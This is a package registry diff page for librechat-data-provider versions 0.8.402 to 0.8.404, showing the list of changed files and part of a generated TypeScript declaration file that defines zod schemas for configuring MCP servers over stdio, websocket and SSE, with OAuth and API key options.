librechat-data-provider 0.8.402 → 0.8.404

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (109) hide show
  1. package/dist/index.es.js +1 -1
  2. package/dist/index.es.js.map +1 -1
  3. package/dist/index.js +1 -1
  4. package/dist/index.js.map +1 -1
  5. package/dist/react-query/index.es.js +1 -1
  6. package/dist/react-query/index.es.js.map +1 -1
  7. package/dist/types/accessPermissions.d.ts +744 -0
  8. package/dist/types/actions.d.ts +118 -0
  9. package/dist/types/api-endpoints.d.ts +150 -0
  10. package/dist/types/artifacts.d.ts +97 -0
  11. package/dist/types/azure.d.ts +22 -0
  12. package/dist/types/bedrock.d.ts +1220 -0
  13. package/dist/types/config.d.ts +14849 -0
  14. package/dist/types/config.spec.d.ts +1 -0
  15. package/dist/types/createPayload.d.ts +5 -0
  16. package/dist/types/data-service.d.ts +287 -0
  17. package/dist/types/feedback.d.ts +36 -0
  18. package/dist/types/file-config.d.ts +263 -0
  19. package/dist/types/file-config.spec.d.ts +1 -0
  20. package/dist/types/generate.d.ts +597 -0
  21. package/dist/types/headers-helpers.d.ts +2 -0
  22. package/{src/index.ts → dist/types/index.d.ts} +0 -15
  23. package/dist/types/keys.d.ts +92 -0
  24. package/dist/types/mcp.d.ts +2760 -0
  25. package/dist/types/messages.d.ts +10 -0
  26. package/dist/types/models.d.ts +1547 -0
  27. package/dist/types/parameterSettings.d.ts +69 -0
  28. package/dist/types/parsers.d.ts +110 -0
  29. package/dist/types/permissions.d.ts +522 -0
  30. package/dist/types/react-query/react-query-service.d.ts +85 -0
  31. package/dist/types/request.d.ts +25 -0
  32. package/dist/types/roles.d.ts +554 -0
  33. package/dist/types/roles.spec.d.ts +1 -0
  34. package/dist/types/schemas.d.ts +5110 -0
  35. package/dist/types/schemas.spec.d.ts +1 -0
  36. package/dist/types/types/agents.d.ts +433 -0
  37. package/dist/types/types/assistants.d.ts +547 -0
  38. package/dist/types/types/files.d.ts +172 -0
  39. package/dist/types/types/graph.d.ts +135 -0
  40. package/{src/types/mcpServers.ts → dist/types/types/mcpServers.d.ts} +12 -18
  41. package/dist/types/types/mutations.d.ts +209 -0
  42. package/dist/types/types/queries.d.ts +169 -0
  43. package/dist/types/types/runs.d.ts +36 -0
  44. package/dist/types/types/web.d.ts +520 -0
  45. package/dist/types/types.d.ts +503 -0
  46. package/dist/types/utils.d.ts +12 -0
  47. package/package.json +5 -1
  48. package/babel.config.js +0 -4
  49. package/check_updates.sh +0 -52
  50. package/jest.config.js +0 -19
  51. package/react-query/package-lock.json +0 -292
  52. package/react-query/package.json +0 -10
  53. package/rollup.config.js +0 -74
  54. package/server-rollup.config.js +0 -40
  55. package/specs/actions.spec.ts +0 -2533
  56. package/specs/api-endpoints-subdir.spec.ts +0 -140
  57. package/specs/api-endpoints.spec.ts +0 -74
  58. package/specs/azure.spec.ts +0 -844
  59. package/specs/bedrock.spec.ts +0 -862
  60. package/specs/filetypes.spec.ts +0 -175
  61. package/specs/generate.spec.ts +0 -770
  62. package/specs/headers-helpers.spec.ts +0 -24
  63. package/specs/mcp.spec.ts +0 -147
  64. package/specs/openapiSpecs.ts +0 -524
  65. package/specs/parsers.spec.ts +0 -601
  66. package/specs/request-interceptor.spec.ts +0 -304
  67. package/specs/utils.spec.ts +0 -196
  68. package/src/accessPermissions.ts +0 -346
  69. package/src/actions.ts +0 -813
  70. package/src/api-endpoints.ts +0 -440
  71. package/src/artifacts.ts +0 -3104
  72. package/src/azure.ts +0 -328
  73. package/src/bedrock.ts +0 -425
  74. package/src/config.spec.ts +0 -315
  75. package/src/config.ts +0 -2006
  76. package/src/createPayload.ts +0 -46
  77. package/src/data-service.ts +0 -1087
  78. package/src/feedback.ts +0 -141
  79. package/src/file-config.spec.ts +0 -1248
  80. package/src/file-config.ts +0 -764
  81. package/src/generate.ts +0 -634
  82. package/src/headers-helpers.ts +0 -13
  83. package/src/keys.ts +0 -99
  84. package/src/mcp.ts +0 -271
  85. package/src/messages.ts +0 -50
  86. package/src/models.ts +0 -69
  87. package/src/parameterSettings.ts +0 -1111
  88. package/src/parsers.ts +0 -563
  89. package/src/permissions.ts +0 -188
  90. package/src/react-query/react-query-service.ts +0 -566
  91. package/src/request.ts +0 -171
  92. package/src/roles.spec.ts +0 -132
  93. package/src/roles.ts +0 -225
  94. package/src/schemas.spec.ts +0 -355
  95. package/src/schemas.ts +0 -1234
  96. package/src/types/agents.ts +0 -470
  97. package/src/types/assistants.ts +0 -654
  98. package/src/types/files.ts +0 -191
  99. package/src/types/graph.ts +0 -145
  100. package/src/types/mutations.ts +0 -422
  101. package/src/types/queries.ts +0 -208
  102. package/src/types/runs.ts +0 -40
  103. package/src/types/web.ts +0 -588
  104. package/src/types.ts +0 -676
  105. package/src/utils.ts +0 -85
  106. package/tsconfig.json +0 -28
  107. package/tsconfig.spec.json +0 -10
  108. /package/{src/react-query/index.ts → dist/types/react-query/index.d.ts} +0 -0
  109. /package/{src/types/index.ts → dist/types/types/index.d.ts} +0 -0
package/dist/types/mcp.d.ts ADDED
@@ -0,0 +1,2760 @@
1
+ import { z } from 'zod';
2
+ import { TokenExchangeMethodEnum } from './types/agents';
3
+ export declare const StdioOptionsSchema: z.ZodObject<{
4
+ /** Display name for the MCP server - only letters, numbers, and spaces allowed */
5
+ title: z.ZodOptional<z.ZodString>;
6
+ /** Description of the MCP server */
7
+ description: z.ZodOptional<z.ZodString>;
8
+ /**
9
+ * Controls whether the MCP server is initialized during application startup.
10
+ * - true (default): Server is initialized during app startup and included in app-level connections
11
+ * - false: Skips initialization at startup and excludes from app-level connections - useful for servers
12
+ * requiring manual authentication (e.g., GitHub PAT tokens) that need to be configured through the UI after startup
13
+ */
14
+ startup: z.ZodOptional<z.ZodBoolean>;
15
+ iconPath: z.ZodOptional<z.ZodString>;
16
+ timeout: z.ZodOptional<z.ZodNumber>;
17
+ /** Timeout (ms) for the long-lived SSE GET stream body before undici aborts it. Default: 300_000 (5 min). */
18
+ sseReadTimeout: z.ZodOptional<z.ZodNumber>;
19
+ initTimeout: z.ZodOptional<z.ZodNumber>;
20
+ /** Controls visibility in chat dropdown menu (MCPSelect) */
21
+ chatMenu: z.ZodOptional<z.ZodBoolean>;
22
+ /**
23
+ * Controls server instruction behavior:
24
+ * - undefined/not set: No instructions included (default)
25
+ * - true: Use server-provided instructions
26
+ * - string: Use custom instructions (overrides server-provided)
27
+ */
28
+ serverInstructions: z.ZodOptional<z.ZodUnion<[z.ZodBoolean, z.ZodString]>>;
29
+ /**
30
+ * Whether this server requires OAuth authentication
31
+ * If not specified, will be auto-detected during construction
32
+ */
33
+ requiresOAuth: z.ZodOptional<z.ZodBoolean>;
34
+ /**
35
+ * OAuth configuration for SSE and Streamable HTTP transports
36
+ * - Optional: OAuth can be auto-discovered on 401 responses
37
+ * - Pre-configured values will skip discovery steps
38
+ */
39
+ oauth: z.ZodOptional<z.ZodObject<{
40
+ /** OAuth authorization endpoint (optional - can be auto-discovered) */
41
+ authorization_url: z.ZodOptional<z.ZodString>;
42
+ /** OAuth token endpoint (optional - can be auto-discovered) */
43
+ token_url: z.ZodOptional<z.ZodString>;
44
+ /** OAuth client ID (optional - can use dynamic registration) */
45
+ client_id: z.ZodOptional<z.ZodString>;
46
+ /** OAuth client secret (optional - can use dynamic registration) */
47
+ client_secret: z.ZodOptional<z.ZodString>;
48
+ /** OAuth scopes to request */
49
+ scope: z.ZodOptional<z.ZodString>;
50
+ /** OAuth redirect URI (defaults to /api/mcp/{serverName}/oauth/callback) */
51
+ redirect_uri: z.ZodOptional<z.ZodString>;
52
+ /** Token exchange method */
53
+ token_exchange_method: z.ZodOptional<z.ZodNativeEnum<typeof TokenExchangeMethodEnum>>;
54
+ /** Supported grant types (defaults to ['authorization_code', 'refresh_token']) */
55
+ grant_types_supported: z.ZodOptional<z.ZodArray<z.ZodString, "many">>;
56
+ /** Supported token endpoint authentication methods (defaults to ['client_secret_basic', 'client_secret_post']) */
57
+ token_endpoint_auth_methods_supported: z.ZodOptional<z.ZodArray<z.ZodString, "many">>;
58
+ /** Supported response types (defaults to ['code']) */
59
+ response_types_supported: z.ZodOptional<z.ZodArray<z.ZodString, "many">>;
60
+ /** Supported code challenge methods (defaults to ['S256', 'plain']) */
61
+ code_challenge_methods_supported: z.ZodOptional<z.ZodArray<z.ZodString, "many">>;
62
+ /** Skip code challenge validation and force S256 (useful for providers like AWS Cognito that support S256 but don't advertise it) */
63
+ skip_code_challenge_check: z.ZodOptional<z.ZodBoolean>;
64
+ /** OAuth revocation endpoint (optional - can be auto-discovered) */
65
+ revocation_endpoint: z.ZodOptional<z.ZodString>;
66
+ /** OAuth revocation endpoint authentication methods supported (optional - can be auto-discovered) */
67
+ revocation_endpoint_auth_methods_supported: z.ZodOptional<z.ZodArray<z.ZodString, "many">>;
68
+ }, "strip", z.ZodTypeAny, {
69
+ authorization_url?: string | undefined;
70
+ token_url?: string | undefined;
71
+ client_id?: string | undefined;
72
+ client_secret?: string | undefined;
73
+ scope?: string | undefined;
74
+ redirect_uri?: string | undefined;
75
+ token_exchange_method?: TokenExchangeMethodEnum | undefined;
76
+ grant_types_supported?: string[] | undefined;
77
+ token_endpoint_auth_methods_supported?: string[] | undefined;
78
+ response_types_supported?: string[] | undefined;
79
+ code_challenge_methods_supported?: string[] | undefined;
80
+ skip_code_challenge_check?: boolean | undefined;
81
+ revocation_endpoint?: string | undefined;
82
+ revocation_endpoint_auth_methods_supported?: string[] | undefined;
83
+ }, {
84
+ authorization_url?: string | undefined;
85
+ token_url?: string | undefined;
86
+ client_id?: string | undefined;
87
+ client_secret?: string | undefined;
88
+ scope?: string | undefined;
89
+ redirect_uri?: string | undefined;
90
+ token_exchange_method?: TokenExchangeMethodEnum | undefined;
91
+ grant_types_supported?: string[] | undefined;
92
+ token_endpoint_auth_methods_supported?: string[] | undefined;
93
+ response_types_supported?: string[] | undefined;
94
+ code_challenge_methods_supported?: string[] | undefined;
95
+ skip_code_challenge_check?: boolean | undefined;
96
+ revocation_endpoint?: string | undefined;
97
+ revocation_endpoint_auth_methods_supported?: string[] | undefined;
98
+ }>>;
99
+ /** Custom headers to send with OAuth requests (registration, discovery, token exchange, etc.) */
100
+ oauth_headers: z.ZodOptional<z.ZodRecord<z.ZodString, z.ZodString>>;
101
+ /**
102
+ * API Key authentication configuration for SSE and Streamable HTTP transports
103
+ * - source: 'admin' means the key is provided by admin and shared by all users
104
+ * - source: 'user' means each user provides their own key via customUserVars
105
+ */
106
+ apiKey: z.ZodOptional<z.ZodObject<{
107
+ /** API key value (only for admin-provided mode, stored encrypted) */
108
+ key: z.ZodOptional<z.ZodString>;
109
+ /** Whether key is provided by admin or each user */
110
+ source: z.ZodEnum<["admin", "user"]>;
111
+ /** How to format the authorization header */
112
+ authorization_type: z.ZodEnum<["basic", "bearer", "custom"]>;
113
+ /** Custom header name when authorization_type is 'custom' */
114
+ custom_header: z.ZodOptional<z.ZodString>;
115
+ }, "strip", z.ZodTypeAny, {
116
+ source: "admin" | "user";
117
+ authorization_type: "custom" | "basic" | "bearer";
118
+ key?: string | undefined;
119
+ custom_header?: string | undefined;
120
+ }, {
121
+ source: "admin" | "user";
122
+ authorization_type: "custom" | "basic" | "bearer";
123
+ key?: string | undefined;
124
+ custom_header?: string | undefined;
125
+ }>>;
126
+ customUserVars: z.ZodOptional<z.ZodRecord<z.ZodString, z.ZodObject<{
127
+ title: z.ZodString;
128
+ description: z.ZodString;
129
+ }, "strip", z.ZodTypeAny, {
130
+ title: string;
131
+ description: string;
132
+ }, {
133
+ title: string;
134
+ description: string;
135
+ }>>>;
136
+ } & {
137
+ type: z.ZodDefault<z.ZodLiteral<"stdio">>;
138
+ /**
139
+ * The executable to run to start the server.
140
+ */
141
+ command: z.ZodString;
142
+ /**
143
+ * Command line arguments to pass to the executable.
144
+ */
145
+ args: z.ZodArray<z.ZodString, "many">;
146
+ /**
147
+ * The environment to use when spawning the process.
148
+ *
149
+ * If not specified, the result of getDefaultEnvironment() will be used.
150
+ * Environment variables can be referenced using ${VAR_NAME} syntax.
151
+ */
152
+ env: z.ZodEffects<z.ZodOptional<z.ZodRecord<z.ZodString, z.ZodString>>, Record<string, string> | undefined, Record<string, string> | undefined>;
153
+ /**
154
+ * How to handle stderr of the child process. This matches the semantics of Node's `child_process.spawn`.
155
+ *
156
+ * @type {import('node:child_process').IOType | import('node:stream').Stream | number}
157
+ *
158
+ * The default is "inherit", meaning messages to stderr will be printed to the parent process's stderr.
159
+ */
160
+ stderr: z.ZodOptional<z.ZodUnion<[z.ZodEnum<["pipe", "ignore", "inherit"]>, z.ZodNumber]>>;
161
+ }, "strip", z.ZodTypeAny, {
162
+ type: "stdio";
163
+ command: string;
164
+ args: string[];
165
+ title?: string | undefined;
166
+ description?: string | undefined;
167
+ startup?: boolean | undefined;
168
+ iconPath?: string | undefined;
169
+ timeout?: number | undefined;
170
+ sseReadTimeout?: number | undefined;
171
+ initTimeout?: number | undefined;
172
+ chatMenu?: boolean | undefined;
173
+ serverInstructions?: string | boolean | undefined;
174
+ requiresOAuth?: boolean | undefined;
175
+ oauth?: {
176
+ authorization_url?: string | undefined;
177
+ token_url?: string | undefined;
178
+ client_id?: string | undefined;
179
+ client_secret?: string | undefined;
180
+ scope?: string | undefined;
181
+ redirect_uri?: string | undefined;
182
+ token_exchange_method?: TokenExchangeMethodEnum | undefined;
183
+ grant_types_supported?: string[] | undefined;
184
+ token_endpoint_auth_methods_supported?: string[] | undefined;
185
+ response_types_supported?: string[] | undefined;
186
+ code_challenge_methods_supported?: string[] | undefined;
187
+ skip_code_challenge_check?: boolean | undefined;
188
+ revocation_endpoint?: string | undefined;
189
+ revocation_endpoint_auth_methods_supported?: string[] | undefined;
190
+ } | undefined;
191
+ oauth_headers?: Record<string, string> | undefined;
192
+ apiKey?: {
193
+ source: "admin" | "user";
194
+ authorization_type: "custom" | "basic" | "bearer";
195
+ key?: string | undefined;
196
+ custom_header?: string | undefined;
197
+ } | undefined;
198
+ customUserVars?: Record<string, {
199
+ title: string;
200
+ description: string;
201
+ }> | undefined;
202
+ env?: Record<string, string> | undefined;
203
+ stderr?: number | "pipe" | "ignore" | "inherit" | undefined;
204
+ }, {
205
+ command: string;
206
+ args: string[];
207
+ title?: string | undefined;
208
+ description?: string | undefined;
209
+ startup?: boolean | undefined;
210
+ iconPath?: string | undefined;
211
+ timeout?: number | undefined;
212
+ sseReadTimeout?: number | undefined;
213
+ initTimeout?: number | undefined;
214
+ chatMenu?: boolean | undefined;
215
+ type?: "stdio" | undefined;
216
+ serverInstructions?: string | boolean | undefined;
217
+ requiresOAuth?: boolean | undefined;
218
+ oauth?: {
219
+ authorization_url?: string | undefined;
220
+ token_url?: string | undefined;
221
+ client_id?: string | undefined;
222
+ client_secret?: string | undefined;
223
+ scope?: string | undefined;
224
+ redirect_uri?: string | undefined;
225
+ token_exchange_method?: TokenExchangeMethodEnum | undefined;
226
+ grant_types_supported?: string[] | undefined;
227
+ token_endpoint_auth_methods_supported?: string[] | undefined;
228
+ response_types_supported?: string[] | undefined;
229
+ code_challenge_methods_supported?: string[] | undefined;
230
+ skip_code_challenge_check?: boolean | undefined;
231
+ revocation_endpoint?: string | undefined;
232
+ revocation_endpoint_auth_methods_supported?: string[] | undefined;
233
+ } | undefined;
234
+ oauth_headers?: Record<string, string> | undefined;
235
+ apiKey?: {
236
+ source: "admin" | "user";
237
+ authorization_type: "custom" | "basic" | "bearer";
238
+ key?: string | undefined;
239
+ custom_header?: string | undefined;
240
+ } | undefined;
241
+ customUserVars?: Record<string, {
242
+ title: string;
243
+ description: string;
244
+ }> | undefined;
245
+ env?: Record<string, string> | undefined;
246
+ stderr?: number | "pipe" | "ignore" | "inherit" | undefined;
247
+ }>;
248
+ export declare const WebSocketOptionsSchema: z.ZodObject<{
249
+ /** Display name for the MCP server - only letters, numbers, and spaces allowed */
250
+ title: z.ZodOptional<z.ZodString>;
251
+ /** Description of the MCP server */
252
+ description: z.ZodOptional<z.ZodString>;
253
+ /**
254
+ * Controls whether the MCP server is initialized during application startup.
255
+ * - true (default): Server is initialized during app startup and included in app-level connections
256
+ * - false: Skips initialization at startup and excludes from app-level connections - useful for servers
257
+ * requiring manual authentication (e.g., GitHub PAT tokens) that need to be configured through the UI after startup
258
+ */
259
+ startup: z.ZodOptional<z.ZodBoolean>;
260
+ iconPath: z.ZodOptional<z.ZodString>;
261
+ timeout: z.ZodOptional<z.ZodNumber>;
262
+ /** Timeout (ms) for the long-lived SSE GET stream body before undici aborts it. Default: 300_000 (5 min). */
263
+ sseReadTimeout: z.ZodOptional<z.ZodNumber>;
264
+ initTimeout: z.ZodOptional<z.ZodNumber>;
265
+ /** Controls visibility in chat dropdown menu (MCPSelect) */
266
+ chatMenu: z.ZodOptional<z.ZodBoolean>;
267
+ /**
268
+ * Controls server instruction behavior:
269
+ * - undefined/not set: No instructions included (default)
270
+ * - true: Use server-provided instructions
271
+ * - string: Use custom instructions (overrides server-provided)
272
+ */
273
+ serverInstructions: z.ZodOptional<z.ZodUnion<[z.ZodBoolean, z.ZodString]>>;
274
+ /**
275
+ * Whether this server requires OAuth authentication
276
+ * If not specified, will be auto-detected during construction
277
+ */
278
+ requiresOAuth: z.ZodOptional<z.ZodBoolean>;
279
+ /**
280
+ * OAuth configuration for SSE and Streamable HTTP transports
281
+ * - Optional: OAuth can be auto-discovered on 401 responses
282
+ * - Pre-configured values will skip discovery steps
283
+ */
284
+ oauth: z.ZodOptional<z.ZodObject<{
285
+ /** OAuth authorization endpoint (optional - can be auto-discovered) */
286
+ authorization_url: z.ZodOptional<z.ZodString>;
287
+ /** OAuth token endpoint (optional - can be auto-discovered) */
288
+ token_url: z.ZodOptional<z.ZodString>;
289
+ /** OAuth client ID (optional - can use dynamic registration) */
290
+ client_id: z.ZodOptional<z.ZodString>;
291
+ /** OAuth client secret (optional - can use dynamic registration) */
292
+ client_secret: z.ZodOptional<z.ZodString>;
293
+ /** OAuth scopes to request */
294
+ scope: z.ZodOptional<z.ZodString>;
295
+ /** OAuth redirect URI (defaults to /api/mcp/{serverName}/oauth/callback) */
296
+ redirect_uri: z.ZodOptional<z.ZodString>;
297
+ /** Token exchange method */
298
+ token_exchange_method: z.ZodOptional<z.ZodNativeEnum<typeof TokenExchangeMethodEnum>>;
299
+ /** Supported grant types (defaults to ['authorization_code', 'refresh_token']) */
300
+ grant_types_supported: z.ZodOptional<z.ZodArray<z.ZodString, "many">>;
301
+ /** Supported token endpoint authentication methods (defaults to ['client_secret_basic', 'client_secret_post']) */
302
+ token_endpoint_auth_methods_supported: z.ZodOptional<z.ZodArray<z.ZodString, "many">>;
303
+ /** Supported response types (defaults to ['code']) */
304
+ response_types_supported: z.ZodOptional<z.ZodArray<z.ZodString, "many">>;
305
+ /** Supported code challenge methods (defaults to ['S256', 'plain']) */
306
+ code_challenge_methods_supported: z.ZodOptional<z.ZodArray<z.ZodString, "many">>;
307
+ /** Skip code challenge validation and force S256 (useful for providers like AWS Cognito that support S256 but don't advertise it) */
308
+ skip_code_challenge_check: z.ZodOptional<z.ZodBoolean>;
309
+ /** OAuth revocation endpoint (optional - can be auto-discovered) */
310
+ revocation_endpoint: z.ZodOptional<z.ZodString>;
311
+ /** OAuth revocation endpoint authentication methods supported (optional - can be auto-discovered) */
312
+ revocation_endpoint_auth_methods_supported: z.ZodOptional<z.ZodArray<z.ZodString, "many">>;
313
+ }, "strip", z.ZodTypeAny, {
314
+ authorization_url?: string | undefined;
315
+ token_url?: string | undefined;
316
+ client_id?: string | undefined;
317
+ client_secret?: string | undefined;
318
+ scope?: string | undefined;
319
+ redirect_uri?: string | undefined;
320
+ token_exchange_method?: TokenExchangeMethodEnum | undefined;
321
+ grant_types_supported?: string[] | undefined;
322
+ token_endpoint_auth_methods_supported?: string[] | undefined;
323
+ response_types_supported?: string[] | undefined;
324
+ code_challenge_methods_supported?: string[] | undefined;
325
+ skip_code_challenge_check?: boolean | undefined;
326
+ revocation_endpoint?: string | undefined;
327
+ revocation_endpoint_auth_methods_supported?: string[] | undefined;
328
+ }, {
329
+ authorization_url?: string | undefined;
330
+ token_url?: string | undefined;
331
+ client_id?: string | undefined;
332
+ client_secret?: string | undefined;
333
+ scope?: string | undefined;
334
+ redirect_uri?: string | undefined;
335
+ token_exchange_method?: TokenExchangeMethodEnum | undefined;
336
+ grant_types_supported?: string[] | undefined;
337
+ token_endpoint_auth_methods_supported?: string[] | undefined;
338
+ response_types_supported?: string[] | undefined;
339
+ code_challenge_methods_supported?: string[] | undefined;
340
+ skip_code_challenge_check?: boolean | undefined;
341
+ revocation_endpoint?: string | undefined;
342
+ revocation_endpoint_auth_methods_supported?: string[] | undefined;
343
+ }>>;
344
+ /** Custom headers to send with OAuth requests (registration, discovery, token exchange, etc.) */
345
+ oauth_headers: z.ZodOptional<z.ZodRecord<z.ZodString, z.ZodString>>;
346
+ /**
347
+ * API Key authentication configuration for SSE and Streamable HTTP transports
348
+ * - source: 'admin' means the key is provided by admin and shared by all users
349
+ * - source: 'user' means each user provides their own key via customUserVars
350
+ */
351
+ apiKey: z.ZodOptional<z.ZodObject<{
352
+ /** API key value (only for admin-provided mode, stored encrypted) */
353
+ key: z.ZodOptional<z.ZodString>;
354
+ /** Whether key is provided by admin or each user */
355
+ source: z.ZodEnum<["admin", "user"]>;
356
+ /** How to format the authorization header */
357
+ authorization_type: z.ZodEnum<["basic", "bearer", "custom"]>;
358
+ /** Custom header name when authorization_type is 'custom' */
359
+ custom_header: z.ZodOptional<z.ZodString>;
360
+ }, "strip", z.ZodTypeAny, {
361
+ source: "admin" | "user";
362
+ authorization_type: "custom" | "basic" | "bearer";
363
+ key?: string | undefined;
364
+ custom_header?: string | undefined;
365
+ }, {
366
+ source: "admin" | "user";
367
+ authorization_type: "custom" | "basic" | "bearer";
368
+ key?: string | undefined;
369
+ custom_header?: string | undefined;
370
+ }>>;
371
+ customUserVars: z.ZodOptional<z.ZodRecord<z.ZodString, z.ZodObject<{
372
+ title: z.ZodString;
373
+ description: z.ZodString;
374
+ }, "strip", z.ZodTypeAny, {
375
+ title: string;
376
+ description: string;
377
+ }, {
378
+ title: string;
379
+ description: string;
380
+ }>>>;
381
+ } & {
382
+ type: z.ZodDefault<z.ZodLiteral<"websocket">>;
383
+ url: z.ZodEffects<z.ZodPipeline<z.ZodEffects<z.ZodString, string, string>, z.ZodString>, string, string>;
384
+ }, "strip", z.ZodTypeAny, {
385
+ type: "websocket";
386
+ url: string;
387
+ title?: string | undefined;
388
+ description?: string | undefined;
389
+ startup?: boolean | undefined;
390
+ iconPath?: string | undefined;
391
+ timeout?: number | undefined;
392
+ sseReadTimeout?: number | undefined;
393
+ initTimeout?: number | undefined;
394
+ chatMenu?: boolean | undefined;
395
+ serverInstructions?: string | boolean | undefined;
396
+ requiresOAuth?: boolean | undefined;
397
+ oauth?: {
398
+ authorization_url?: string | undefined;
399
+ token_url?: string | undefined;
400
+ client_id?: string | undefined;
401
+ client_secret?: string | undefined;
402
+ scope?: string | undefined;
403
+ redirect_uri?: string | undefined;
404
+ token_exchange_method?: TokenExchangeMethodEnum | undefined;
405
+ grant_types_supported?: string[] | undefined;
406
+ token_endpoint_auth_methods_supported?: string[] | undefined;
407
+ response_types_supported?: string[] | undefined;
408
+ code_challenge_methods_supported?: string[] | undefined;
409
+ skip_code_challenge_check?: boolean | undefined;
410
+ revocation_endpoint?: string | undefined;
411
+ revocation_endpoint_auth_methods_supported?: string[] | undefined;
412
+ } | undefined;
413
+ oauth_headers?: Record<string, string> | undefined;
414
+ apiKey?: {
415
+ source: "admin" | "user";
416
+ authorization_type: "custom" | "basic" | "bearer";
417
+ key?: string | undefined;
418
+ custom_header?: string | undefined;
419
+ } | undefined;
420
+ customUserVars?: Record<string, {
421
+ title: string;
422
+ description: string;
423
+ }> | undefined;
424
+ }, {
425
+ url: string;
426
+ title?: string | undefined;
427
+ description?: string | undefined;
428
+ startup?: boolean | undefined;
429
+ iconPath?: string | undefined;
430
+ timeout?: number | undefined;
431
+ sseReadTimeout?: number | undefined;
432
+ initTimeout?: number | undefined;
433
+ chatMenu?: boolean | undefined;
434
+ type?: "websocket" | undefined;
435
+ serverInstructions?: string | boolean | undefined;
436
+ requiresOAuth?: boolean | undefined;
437
+ oauth?: {
438
+ authorization_url?: string | undefined;
439
+ token_url?: string | undefined;
440
+ client_id?: string | undefined;
441
+ client_secret?: string | undefined;
442
+ scope?: string | undefined;
443
+ redirect_uri?: string | undefined;
444
+ token_exchange_method?: TokenExchangeMethodEnum | undefined;
445
+ grant_types_supported?: string[] | undefined;
446
+ token_endpoint_auth_methods_supported?: string[] | undefined;
447
+ response_types_supported?: string[] | undefined;
448
+ code_challenge_methods_supported?: string[] | undefined;
449
+ skip_code_challenge_check?: boolean | undefined;
450
+ revocation_endpoint?: string | undefined;
451
+ revocation_endpoint_auth_methods_supported?: string[] | undefined;
452
+ } | undefined;
453
+ oauth_headers?: Record<string, string> | undefined;
454
+ apiKey?: {
455
+ source: "admin" | "user";
456
+ authorization_type: "custom" | "basic" | "bearer";
457
+ key?: string | undefined;
458
+ custom_header?: string | undefined;
459
+ } | undefined;
460
+ customUserVars?: Record<string, {
461
+ title: string;
462
+ description: string;
463
+ }> | undefined;
464
+ }>;
465
+ export declare const SSEOptionsSchema: z.ZodObject<{
466
+ /** Display name for the MCP server - only letters, numbers, and spaces allowed */
467
+ title: z.ZodOptional<z.ZodString>;
468
+ /** Description of the MCP server */
469
+ description: z.ZodOptional<z.ZodString>;
470
+ /**
471
+ * Controls whether the MCP server is initialized during application startup.
472
+ * - true (default): Server is initialized during app startup and included in app-level connections
473
+ * - false: Skips initialization at startup and excludes from app-level connections - useful for servers
474
+ * requiring manual authentication (e.g., GitHub PAT tokens) that need to be configured through the UI after startup
475
+ */
476
+ startup: z.ZodOptional<z.ZodBoolean>;
477
+ iconPath: z.ZodOptional<z.ZodString>;
478
+ timeout: z.ZodOptional<z.ZodNumber>;
479
+ /** Timeout (ms) for the long-lived SSE GET stream body before undici aborts it. Default: 300_000 (5 min). */
480
+ sseReadTimeout: z.ZodOptional<z.ZodNumber>;
481
+ initTimeout: z.ZodOptional<z.ZodNumber>;
482
+ /** Controls visibility in chat dropdown menu (MCPSelect) */
483
+ chatMenu: z.ZodOptional<z.ZodBoolean>;
484
+ /**
485
+ * Controls server instruction behavior:
486
+ * - undefined/not set: No instructions included (default)
487
+ * - true: Use server-provided instructions
488
+ * - string: Use custom instructions (overrides server-provided)
489
+ */
490
+ serverInstructions: z.ZodOptional<z.ZodUnion<[z.ZodBoolean, z.ZodString]>>;
491
+ /**
492
+ * Whether this server requires OAuth authentication
493
+ * If not specified, will be auto-detected during construction
494
+ */
495
+ requiresOAuth: z.ZodOptional<z.ZodBoolean>;
496
+ /**
497
+ * OAuth configuration for SSE and Streamable HTTP transports
498
+ * - Optional: OAuth can be auto-discovered on 401 responses
499
+ * - Pre-configured values will skip discovery steps
500
+ */
501
+ oauth: z.ZodOptional<z.ZodObject<{
502
+ /** OAuth authorization endpoint (optional - can be auto-discovered) */
503
+ authorization_url: z.ZodOptional<z.ZodString>;
504
+ /** OAuth token endpoint (optional - can be auto-discovered) */
505
+ token_url: z.ZodOptional<z.ZodString>;
506
+ /** OAuth client ID (optional - can use dynamic registration) */
507
+ client_id: z.ZodOptional<z.ZodString>;
508
+ /** OAuth client secret (optional - can use dynamic registration) */
509
+ client_secret: z.ZodOptional<z.ZodString>;
510
+ /** OAuth scopes to request */
511
+ scope: z.ZodOptional<z.ZodString>;
512
+ /** OAuth redirect URI (defaults to /api/mcp/{serverName}/oauth/callback) */
513
+ redirect_uri: z.ZodOptional<z.ZodString>;
514
+ /** Token exchange method */
515
+ token_exchange_method: z.ZodOptional<z.ZodNativeEnum<typeof TokenExchangeMethodEnum>>;
516
+ /** Supported grant types (defaults to ['authorization_code', 'refresh_token']) */
517
+ grant_types_supported: z.ZodOptional<z.ZodArray<z.ZodString, "many">>;
518
+ /** Supported token endpoint authentication methods (defaults to ['client_secret_basic', 'client_secret_post']) */
519
+ token_endpoint_auth_methods_supported: z.ZodOptional<z.ZodArray<z.ZodString, "many">>;
520
+ /** Supported response types (defaults to ['code']) */
521
+ response_types_supported: z.ZodOptional<z.ZodArray<z.ZodString, "many">>;
522
+ /** Supported code challenge methods (defaults to ['S256', 'plain']) */
523
+ code_challenge_methods_supported: z.ZodOptional<z.ZodArray<z.ZodString, "many">>;
524
+ /** Skip code challenge validation and force S256 (useful for providers like AWS Cognito that support S256 but don't advertise it) */
525
+ skip_code_challenge_check: z.ZodOptional<z.ZodBoolean>;
526
+ /** OAuth revocation endpoint (optional - can be auto-discovered) */
527
+ revocation_endpoint: z.ZodOptional<z.ZodString>;
528
+ /** OAuth revocation endpoint authentication methods supported (optional - can be auto-discovered) */
529
+ revocation_endpoint_auth_methods_supported: z.ZodOptional<z.ZodArray<z.ZodString, "many">>;
530
+ }, "strip", z.ZodTypeAny, {
531
+ authorization_url?: string | undefined;
532
+ token_url?: string | undefined;
533
+ client_id?: string | undefined;
534
+ client_secret?: string | undefined;
535
+ scope?: string | undefined;
536
+ redirect_uri?: string | undefined;
537
+ token_exchange_method?: TokenExchangeMethodEnum | undefined;
538
+ grant_types_supported?: string[] | undefined;
539
+ token_endpoint_auth_methods_supported?: string[] | undefined;
540
+ response_types_supported?: string[] | undefined;
541
+ code_challenge_methods_supported?: string[] | undefined;
542
+ skip_code_challenge_check?: boolean | undefined;
543
+ revocation_endpoint?: string | undefined;
544
+ revocation_endpoint_auth_methods_supported?: string[] | undefined;
545
+ }, {
546
+ authorization_url?: string | undefined;
